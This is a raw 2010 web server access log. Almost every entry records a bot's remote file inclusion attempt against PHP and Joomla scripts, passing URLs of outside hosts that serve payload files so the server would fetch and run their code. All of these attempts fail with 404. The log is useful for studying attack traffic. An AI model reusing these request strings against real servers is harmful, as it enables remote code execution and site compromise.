69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET /logs/access_log.Q109120200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET /logs/access_log.Q109120200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET /logs/access_log.Q109081500//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:38 -0500] "GET /logs/access_log.Q109081500//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:03:52:46 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.10.132.67 - - [17/Jan/2010:03:52:47 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:47 -0500] "GET /logs/access_log.Q109120200%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:47 -0500] "GET /logs/access_log.Q109081500%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:50 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:50 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:50 -0500] "GET /logs/access_log.Q109120200%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:50 -0500] "GET /logs/access_log.Q109081500%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:52:52 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:53:10 -0500] "GET /logs/access_log.Q109092100%20%20//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:53:19 -0500] "GET /logs/access_log.Q109081600%20%20//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:53:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:53:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:53:32 -0500] "GET /logs/access_log.Q109122800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:53:32 -0500] "GET /logs/access_log.Q109101400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:53:54 -0500] "GET /logs///add.php?APB_rp=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:53:54 -0500] "GET /logs/access_log.Q109052300%20%20///add.php?APB_rp=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:53:54 -0500] "GET ///add.php?APB_rp=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:54:13 -0500] "GET ///add.php?APB_rp=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:54:13 -0500] "GET /logs///add.php?APB_rp=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:54:13 -0500] "GET /logs/access_log.Q109052300///add.php?APB_rp=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:54:34 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:54:34 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:54:34 -0500] "GET /logs/access_log.Q109122800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:54:34 -0500] "GET /logs/access_log.Q109101400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET /logs/error_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET /logs/access_log.Q109091100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET /logs/access_log.Q109091100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:03:55:16 -0500] "GET /logs/error_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:55:44 -0500] "GET /logs/access_log.Q109092100%20%20//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:55:52 -0500] "GET /logs/access_log.Q109081600%20%20//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
71.250.232.26 - - [17/Jan/2010:03:56:38 -0500] "GET //appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
71.250.232.26 - - [17/Jan/2010:03:56:39 -0500] "GET /logs/access_log.Q109112100//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
71.250.232.26 - - [17/Jan/2010:03:56:39 -0500] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.208.16.8 - - [17/Jan/2010:03:56:43 -0500] "GET /logs/access_log.Q109052800//index.inc.php?REX[INCLUDE_PATH]=http://83.143.148.154:32000/accounts/inc/.vsh/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
74.208.16.8 - - [17/Jan/2010:03:56:43 -0500] "GET //index.inc.php?REX[INCLUDE_PATH]=http://83.143.148.154:32000/accounts/inc/.vsh/id.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.208.16.8 - - [17/Jan/2010:03:56:43 -0500] "GET /logs//index.inc.php?REX[INCLUDE_PATH]=http://83.143.148.154:32000/accounts/inc/.vsh/id.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
74.208.16.8 - - [17/Jan/2010:03:56:51 -0500] "GET /logs/access_log.Q109060300//index.inc.php?REX[INCLUDE_PATH]=http://83.143.148.154:32000/accounts/inc/.vsh/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
69.16.230.82 - - [17/Jan/2010:03:57:07 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:07 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:07 -0500] "GET /logs/access_log.Q109081500%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:12 -0500] "GET /logs/error_log.Q109120900%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:30 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:30 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:30 -0500] "GET /logs/access_log.Q109110100%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:35 -0500] "GET /logs/error_log.Q109110100%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:54 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:54 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:54 -0500] "GET /logs/access_log.Q109110100///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:57 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:57 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:57:59 -0500] "GET /logs/error_log.Q109110100///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:58:00 -0500] "GET /logs/access_log.Q109071200///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:58:11 -0500] "GET /logs/access_log.Q109120900///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:03:58:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.10.132.67 - - [17/Jan/2010:03:58:12 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:12 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:13 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:13 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:16 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:16 -0500] "GET /logs/access_log.Q110010700%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:16 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:16 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:16 -0500] "GET /logs/access_log.Q110010700%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:20 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:32 -0500] "GET /logs/access_log.Q110010700//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:58:32 -0500] "GET /logs/access_log.Q110010700//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
38.102.74.19 - - [17/Jan/2010:03:59:34 -0500] "GET //delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 213 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
38.102.74.19 - - [17/Jan/2010:03:59:34 -0500] "GET /logs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 218 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
71.250.232.26 - - [17/Jan/2010:03:59:41 -0500] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
71.250.232.26 - - [17/Jan/2010:03:59:42 -0500] "GET //appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
71.250.232.26 - - [17/Jan/2010:03:59:42 -0500] "GET /logs/access_log.Q109112100//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:59:53 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:59:53 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:03:59:53 -0500] "GET /logs/access_log.Q110010700//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:00:02 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:00:02 -0500] "GET /logs/access_log.Q110010700//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:00:07 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
71.250.232.26 - - [17/Jan/2010:04:00:21 -0500] "GET /logs/access_log.Q109080600//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:04:00:26 -0500] "GET /logs/access_log.Q109110200%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:04:00:34 -0500] "GET /logs/access_log.Q109110200%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:01:33 -0500] "GET /logs/error_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:01:33 -0500] "GET /logs/access_log.Q109091100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:15 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:15 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:15 -0500] "GET /logs/access_log.Q109102900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:16 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:16 -0500] "GET /logs/access_log.Q109102900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:17 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:18 -0500] "GET /logs/access_log.Q109102900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:18 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:02:19 -0500] "GET /logs/access_log.Q109091100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:02:19 -0500] "GET /logs/error_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:20 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:20 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:20 -0500] "GET /logs/access_log.Q109102900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:21 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:02:23 -0500] "GET /logs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.68.2.144 - - [17/Jan/2010:04:02:23 -0500] "GET /bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.93.147.154 - - [17/Jan/2010:04:02:23 -0500] "GET /logs/access_log.Q109101600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:25 -0500] "GET /logs/access_log.Q109101600%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:27 -0500] "GET /logs/access_log.Q109101600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:02:31 -0500] "GET /logs/access_log.Q109101600%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:04:02:20 -0500] "GET /logs/access_log.Q109081800 HTTP/1.1" 200 5710162 "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.93.147.154 - - [17/Jan/2010:04:04:11 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:04:11 -0500] "GET /logs/access_log.Q109080600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:04:11 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
